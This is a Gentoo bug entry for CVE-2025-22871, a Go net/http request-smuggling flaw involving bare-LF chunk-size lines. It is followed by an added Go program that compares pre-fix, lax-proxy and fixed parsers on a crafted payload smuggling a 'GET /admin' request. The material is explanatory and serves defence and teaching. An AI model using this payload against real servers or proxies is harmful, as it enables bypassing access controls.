Bug 953351 (CVE-2025-22871) - <dev-lang/go-{1.23.8,1.24.2}: net/http: request smuggling through invalid chunked data
Status: CONFIRMED
Alias: CVE-2025-22871
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
Importance: Normal normal (priority, severity)
Assignee: Gentoo Security
URL:
Whiteboard: A3 [glsa? cleanup]
Keywords:
Depends on: 953353 953354
Blocks:
Reported: 2025-04-07 13:45 UTC by William Hubbs
Modified: 2025-04-18 12:34 UTC (History)

See Also:
Package list:
Runtime testing required: ---


Description William Hubbs gentoo-dev 2025-04-07 13:45:47 UTC
The net/http package accepted data in the chunked transfer encoding
containing an invalid chunk-size line terminated by a bare LF.
When used in conjunction with a server or proxy which incorrectly
interprets a bare LF in a chunk extension as part of the extension,
this could permit request smuggling.

The net/http package now rejects chunk-size lines containing a bare LF.

Thanks to Jeppe Bonde Weikop for reporting this issue.

This is CVE-2025-22871 and Go issue https://go.dev/issue/71988.
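The smuggling primitive described in the report is a parser disagreement over where a chunk-size line ends. The Go program below is an added illustration, not code from the bug, from net/http or from the Go fix: it implements a minimal chunked decoder with three selectable line-termination rules (bare LF accepted, as in pre-fix net/http; LF treated as part of the chunk extension, as in the other server or proxy the report describes; CRLF required, as in the fixed net/http) and feeds all three the same constructed wire bytes. The payload, the `/admin` request line and the mode and function names are this example's own assumptions.

```go
package main

import (
	"bufio"
	"bytes"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// LineMode selects how a parser decides where a chunk-size line ends.
type LineMode int

const (
	// BareLF: the line ends at the first LF; a preceding CR, if any, is
	// dropped. Models net/http before the fix (bare LF accepted).
	BareLF LineMode = iota
	// CRLFOnly: the line ends only at CRLF, so a bare LF is treated as part
	// of the chunk extension. Models the other parser named in the report.
	CRLFOnly
	// Strict: the line ends at the first LF but is rejected unless that LF
	// is preceded by CR. Models net/http after the fix.
	Strict
)

// readChunkSizeLine returns one chunk-size line without its terminator,
// copied out of the bufio buffer, according to mode.
func readChunkSizeLine(r *bufio.Reader, mode LineMode) ([]byte, error) {
	var line []byte
	for {
		seg, err := r.ReadSlice('\n')
		line = append(line, seg...)
		if err != nil {
			return nil, err
		}
		if bytes.HasSuffix(line, []byte("\r\n")) {
			return line[:len(line)-2], nil
		}
		switch mode {
		case BareLF:
			return line[:len(line)-1], nil
		case Strict:
			return nil, errors.New("chunk-size line terminated by bare LF")
		case CRLFOnly:
			// Bare LF is "part of the extension": keep reading to a CRLF.
		default:
			return nil, errors.New("unknown line mode")
		}
	}
}

// decodeChunked decodes a chunked body from wire and returns the decoded
// body plus the bytes left after the last-chunk and its empty trailer,
// i.e. what a server would treat as the start of the next request.
func decodeChunked(wire []byte, mode LineMode) (body, rest []byte, err error) {
	r := bufio.NewReader(bytes.NewReader(wire))
	for {
		line, err := readChunkSizeLine(r, mode)
		if err != nil {
			return nil, nil, err
		}
		if i := bytes.IndexByte(line, ';'); i >= 0 { // drop chunk-ext
			line = line[:i]
		}
		n, err := strconv.ParseUint(string(bytes.TrimRight(line, " \t")), 16, 32)
		if err != nil {
			return nil, nil, fmt.Errorf("bad chunk size %q: %w", line, err)
		}
		if n == 0 { // last-chunk: expect an empty trailer section (bare CRLF)
			end, err := r.ReadSlice('\n')
			if err != nil || string(end) != "\r\n" {
				return nil, nil, errors.New("malformed trailer section")
			}
			rest, err = io.ReadAll(r)
			return body, rest, err
		}
		data := make([]byte, n)
		if _, err := io.ReadFull(r, data); err != nil {
			return nil, nil, fmt.Errorf("short chunk data: %w", err)
		}
		body = append(body, data...)
		crlf := make([]byte, 2)
		if _, err := io.ReadFull(r, crlf); err != nil || string(crlf) != "\r\n" {
			return nil, nil, errors.New("chunk data not followed by CRLF")
		}
	}
}

// smugglingPayload is the constructed wire body for this example. The
// chunk-size line "23;ext" ends in a bare LF; 0x23 = 35 = 5 bytes of fake
// last-chunk plus the 30-byte smuggled request, so a CRLF-only parser
// swallows both as chunk data while a bare-LF parser stops after the A's.
func smugglingPayload() []byte {
	smuggled := "GET /admin HTTP/1.1\r\nHost: x\r\n" // 30 bytes, assumed target
	return []byte("23;ext\n" + strings.Repeat("A", 35) + "\r\n" +
		"0\r\n\r\n" + smuggled + "\r\n0\r\n\r\n")
}

func main() {
	wire := smugglingPayload()
	for _, m := range []struct {
		name string
		mode LineMode
	}{{"bare LF (pre-fix net/http)", BareLF}, {"CRLF only (LF in ext)", CRLFOnly}, {"strict (fixed net/http)", Strict}} {
		body, rest, err := decodeChunked(wire, m.mode)
		fmt.Printf("%-28s err=%v body=%q rest=%q\n", m.name, err, body, rest)
	}
}
```

Run as written, the CRLF-only parser reports one complete body and no leftover bytes, so a proxy built that way forwards the whole payload as a single request; the bare-LF parser reports a 35-byte body followed by `GET /admin HTTP/1.1...` as leftover, which a pre-fix Go server would read as a second request. The strict parser refuses the body at the first chunk-size line, which is the fix: once both sides reject bare LF, there is no boundary to disagree about.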